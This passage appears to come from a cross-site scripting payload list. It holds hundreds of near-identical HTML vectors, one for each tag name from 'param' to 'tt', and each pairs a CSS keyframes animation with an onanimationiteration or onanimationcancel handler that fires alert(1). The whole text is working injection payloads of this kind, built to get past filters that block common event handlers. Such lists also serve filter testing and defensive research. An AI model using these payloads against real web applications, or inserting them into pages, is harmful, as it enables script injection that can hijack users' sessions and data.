style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></param> +<style>@keyframes slidein {}</style><picture style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></picture> +<style>@keyframes slidein {}</style><plaintext style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></plaintext> +<style>@keyframes slidein {}</style><pre style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></pre> +<style>@keyframes slidein {}</style><progress style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></progress> +<style>@keyframes slidein {}</style><q style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></q> +<style>@keyframes slidein {}</style><rb style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rb> +<style>@keyframes slidein {}</style><rp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rp> +<style>@keyframes slidein {}</style><rt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rt> +<style>@keyframes slidein {}</style><rtc style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></rtc> +<style>@keyframes slidein {}</style><ruby style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ruby> +<style>@keyframes slidein {}</style><s style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></s> +<style>@keyframes slidein {}</style><samp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></samp> +<style>@keyframes slidein {}</style><script style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></script> +<style>@keyframes slidein {}</style><section style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></section> +<style>@keyframes slidein {}</style><select style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></select> +<style>@keyframes slidein {}</style><shadow style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></shadow> +<style>@keyframes slidein {}</style><slot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></slot> +<style>@keyframes slidein {}</style><small style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></small> +<style>@keyframes slidein {}</style><source style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></source> +<style>@keyframes slidein {}</style><spacer style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></spacer> +<style>@keyframes slidein {}</style><span style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></span> +<style>@keyframes slidein {}</style><strike style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strike> +<style>@keyframes slidein {}</style><strong style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></strong> +<style>@keyframes slidein {}</style><style style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></style> +<style>@keyframes slidein {}</style><sub style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sub> +<style>@keyframes slidein {}</style><summary style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></summary> +<style>@keyframes slidein {}</style><sup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></sup> +<style>@keyframes slidein {}</style><svg style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></svg> +<style>@keyframes slidein {}</style><table style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></table> +<style>@keyframes slidein {}</style><tbody style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tbody> +<style>@keyframes slidein {}</style><td style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></td> +<style>@keyframes slidein {}</style><template style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></template> +<style>@keyframes slidein {}</style><textarea style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></textarea> +<style>@keyframes slidein {}</style><tfoot style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tfoot> +<style>@keyframes slidein {}</style><th style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></th> +<style>@keyframes slidein {}</style><thead style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></thead> +<style>@keyframes slidein {}</style><time style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></time> +<style>@keyframes slidein {}</style><title style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></title> +<style>@keyframes slidein {}</style><tr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tr> +<style>@keyframes slidein {}</style><track style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></track> +<style>@keyframes slidein {}</style><tt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></tt> +<style>@keyframes slidein {}</style><u style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></u> +<style>@keyframes slidein {}</style><ul style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></ul> +<style>@keyframes slidein {}</style><var style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></var> +<style>@keyframes slidein {}</style><video style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></video> +<style>@keyframes slidein {}</style><wbr style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></wbr> +<style>@keyframes slidein {}</style><xmp style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xmp> +<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><a id=x style="position:absolute;" onanimationcancel="alert(1)"></a> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><abbr id=x style="position:absolute;" onanimationcancel="alert(1)"></abbr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><acronym id=x style="position:absolute;" onanimationcancel="alert(1)"></acronym> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><address id=x style="position:absolute;" onanimationcancel="alert(1)"></address> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><applet id=x style="position:absolute;" onanimationcancel="alert(1)"></applet> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><area id=x style="position:absolute;" onanimationcancel="alert(1)"></area> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><article id=x style="position:absolute;" onanimationcancel="alert(1)"></article> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><aside id=x style="position:absolute;" onanimationcancel="alert(1)"></aside> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><audio id=x style="position:absolute;" onanimationcancel="alert(1)"></audio> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><b id=x style="position:absolute;" onanimationcancel="alert(1)"></b> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><base id=x style="position:absolute;" onanimationcancel="alert(1)"></base> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><basefont id=x style="position:absolute;" onanimationcancel="alert(1)"></basefont> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdi id=x style="position:absolute;" onanimationcancel="alert(1)"></bdi> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bdo id=x style="position:absolute;" onanimationcancel="alert(1)"></bdo> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><bgsound id=x style="position:absolute;" onanimationcancel="alert(1)"></bgsound> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><big id=x style="position:absolute;" onanimationcancel="alert(1)"></big> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blink id=x style="position:absolute;" onanimationcancel="alert(1)"></blink> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><blockquote id=x style="position:absolute;" onanimationcancel="alert(1)"></blockquote> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><body id=x style="position:absolute;" onanimationcancel="alert(1)"></body> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><br id=x style="position:absolute;" onanimationcancel="alert(1)"></br> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><button id=x style="position:absolute;" onanimationcancel="alert(1)"></button> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><canvas id=x style="position:absolute;" onanimationcancel="alert(1)"></canvas> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><caption id=x style="position:absolute;" onanimationcancel="alert(1)"></caption> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><center id=x style="position:absolute;" onanimationcancel="alert(1)"></center> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><cite id=x style="position:absolute;" onanimationcancel="alert(1)"></cite> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><code id=x style="position:absolute;" onanimationcancel="alert(1)"></code> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><col id=x style="position:absolute;" onanimationcancel="alert(1)"></col> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><colgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></colgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><command id=x style="position:absolute;" onanimationcancel="alert(1)"></command> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><content id=x style="position:absolute;" onanimationcancel="alert(1)"></content> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><data id=x style="position:absolute;" onanimationcancel="alert(1)"></data> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><datalist id=x style="position:absolute;" onanimationcancel="alert(1)"></datalist> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dd id=x style="position:absolute;" onanimationcancel="alert(1)"></dd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><del id=x style="position:absolute;" onanimationcancel="alert(1)"></del> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><details id=x style="position:absolute;" onanimationcancel="alert(1)"></details> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dfn id=x style="position:absolute;" onanimationcancel="alert(1)"></dfn> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dialog id=x style="position:absolute;" onanimationcancel="alert(1)"></dialog> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dir id=x style="position:absolute;" onanimationcancel="alert(1)"></dir> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><div id=x style="position:absolute;" onanimationcancel="alert(1)"></div> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dl id=x style="position:absolute;" onanimationcancel="alert(1)"></dl> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><dt id=x style="position:absolute;" onanimationcancel="alert(1)"></dt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><element id=x style="position:absolute;" onanimationcancel="alert(1)"></element> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><em id=x style="position:absolute;" onanimationcancel="alert(1)"></em> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><embed id=x style="position:absolute;" onanimationcancel="alert(1)"></embed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><fieldset id=x style="position:absolute;" onanimationcancel="alert(1)"></fieldset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figcaption id=x style="position:absolute;" onanimationcancel="alert(1)"></figcaption> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><figure id=x style="position:absolute;" onanimationcancel="alert(1)"></figure> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><font id=x style="position:absolute;" onanimationcancel="alert(1)"></font> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><footer id=x style="position:absolute;" onanimationcancel="alert(1)"></footer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><form id=x style="position:absolute;" onanimationcancel="alert(1)"></form> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frame id=x style="position:absolute;" onanimationcancel="alert(1)"></frame> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><frameset id=x style="position:absolute;" onanimationcancel="alert(1)"></frameset> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><h1 id=x style="position:absolute;" onanimationcancel="alert(1)"></h1> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><head id=x style="position:absolute;" onanimationcancel="alert(1)"></head> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><header id=x style="position:absolute;" onanimationcancel="alert(1)"></header> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></hgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><hr id=x style="position:absolute;" onanimationcancel="alert(1)"></hr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><html id=x style="position:absolute;" onanimationcancel="alert(1)"></html> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><i id=x style="position:absolute;" onanimationcancel="alert(1)"></i> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><iframe id=x style="position:absolute;" onanimationcancel="alert(1)"></iframe> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><image id=x style="position:absolute;" onanimationcancel="alert(1)"></image> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><img id=x style="position:absolute;" onanimationcancel="alert(1)"></img> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><input id=x style="position:absolute;" onanimationcancel="alert(1)"></input> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ins id=x style="position:absolute;" onanimationcancel="alert(1)"></ins> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><isindex id=x style="position:absolute;" onanimationcancel="alert(1)"></isindex> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><kbd id=x style="position:absolute;" onanimationcancel="alert(1)"></kbd> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><keygen id=x style="position:absolute;" onanimationcancel="alert(1)"></keygen> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><label id=x style="position:absolute;" onanimationcancel="alert(1)"></label> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><legend id=x style="position:absolute;" onanimationcancel="alert(1)"></legend> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><li id=x style="position:absolute;" onanimationcancel="alert(1)"></li> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><link id=x style="position:absolute;" onanimationcancel="alert(1)"></link> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><listing id=x style="position:absolute;" onanimationcancel="alert(1)"></listing> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><main id=x style="position:absolute;" onanimationcancel="alert(1)"></main> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><map id=x style="position:absolute;" onanimationcancel="alert(1)"></map> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><mark id=x style="position:absolute;" onanimationcancel="alert(1)"></mark> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><marquee id=x style="position:absolute;" onanimationcancel="alert(1)"></marquee> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menu id=x style="position:absolute;" onanimationcancel="alert(1)"></menu> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><menuitem id=x style="position:absolute;" onanimationcancel="alert(1)"></menuitem> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meta id=x style="position:absolute;" onanimationcancel="alert(1)"></meta> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><meter id=x style="position:absolute;" onanimationcancel="alert(1)"></meter> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><multicol id=x style="position:absolute;" onanimationcancel="alert(1)"></multicol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nav id=x style="position:absolute;" onanimationcancel="alert(1)"></nav> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nextid id=x style="position:absolute;" onanimationcancel="alert(1)"></nextid> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><nobr id=x style="position:absolute;" onanimationcancel="alert(1)"></nobr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noembed id=x style="position:absolute;" onanimationcancel="alert(1)"></noembed> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noframes id=x style="position:absolute;" onanimationcancel="alert(1)"></noframes> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><noscript id=x style="position:absolute;" onanimationcancel="alert(1)"></noscript> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><object id=x style="position:absolute;" onanimationcancel="alert(1)"></object> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ol id=x style="position:absolute;" onanimationcancel="alert(1)"></ol> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><optgroup id=x style="position:absolute;" onanimationcancel="alert(1)"></optgroup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><option id=x style="position:absolute;" onanimationcancel="alert(1)"></option> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><output id=x style="position:absolute;" onanimationcancel="alert(1)"></output> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><p id=x style="position:absolute;" onanimationcancel="alert(1)"></p> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><param id=x style="position:absolute;" onanimationcancel="alert(1)"></param> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><picture id=x style="position:absolute;" onanimationcancel="alert(1)"></picture> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><plaintext id=x style="position:absolute;" onanimationcancel="alert(1)"></plaintext> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><pre id=x style="position:absolute;" onanimationcancel="alert(1)"></pre> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><progress id=x style="position:absolute;" onanimationcancel="alert(1)"></progress> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><q id=x style="position:absolute;" onanimationcancel="alert(1)"></q> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rb id=x style="position:absolute;" onanimationcancel="alert(1)"></rb> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rp id=x style="position:absolute;" onanimationcancel="alert(1)"></rp> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rt id=x style="position:absolute;" onanimationcancel="alert(1)"></rt> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><rtc id=x style="position:absolute;" onanimationcancel="alert(1)"></rtc> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><ruby id=x style="position:absolute;" onanimationcancel="alert(1)"></ruby> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><s id=x style="position:absolute;" onanimationcancel="alert(1)"></s> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><samp id=x style="position:absolute;" onanimationcancel="alert(1)"></samp> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><script id=x style="position:absolute;" onanimationcancel="alert(1)"></script> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><section id=x style="position:absolute;" onanimationcancel="alert(1)"></section> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><select id=x style="position:absolute;" onanimationcancel="alert(1)"></select> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><shadow id=x style="position:absolute;" onanimationcancel="alert(1)"></shadow> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><slot id=x style="position:absolute;" onanimationcancel="alert(1)"></slot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><small id=x style="position:absolute;" onanimationcancel="alert(1)"></small> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><source id=x style="position:absolute;" onanimationcancel="alert(1)"></source> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><spacer id=x style="position:absolute;" onanimationcancel="alert(1)"></spacer> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><span id=x style="position:absolute;" onanimationcancel="alert(1)"></span> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strike id=x style="position:absolute;" onanimationcancel="alert(1)"></strike> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><strong id=x style="position:absolute;" onanimationcancel="alert(1)"></strong> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><style id=x style="position:absolute;" onanimationcancel="alert(1)"></style> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sub id=x style="position:absolute;" onanimationcancel="alert(1)"></sub> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><summary id=x style="position:absolute;" onanimationcancel="alert(1)"></summary> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><sup id=x style="position:absolute;" onanimationcancel="alert(1)"></sup> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><svg id=x style="position:absolute;" onanimationcancel="alert(1)"></svg> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><table id=x style="position:absolute;" onanimationcancel="alert(1)"></table> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tbody id=x style="position:absolute;" onanimationcancel="alert(1)"></tbody> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><td id=x style="position:absolute;" onanimationcancel="alert(1)"></td> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><template id=x style="position:absolute;" onanimationcancel="alert(1)"></template> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><textarea id=x style="position:absolute;" onanimationcancel="alert(1)"></textarea> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tfoot id=x style="position:absolute;" onanimationcancel="alert(1)"></tfoot> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><th id=x style="position:absolute;" onanimationcancel="alert(1)"></th> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><thead id=x style="position:absolute;" onanimationcancel="alert(1)"></thead> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><time id=x style="position:absolute;" onanimationcancel="alert(1)"></time> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><title id=x style="position:absolute;" onanimationcancel="alert(1)"></title> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tr id=x style="position:absolute;" onanimationcancel="alert(1)"></tr> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><track id=x style="position:absolute;" onanimationcancel="alert(1)"></track> +<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><tt id=x 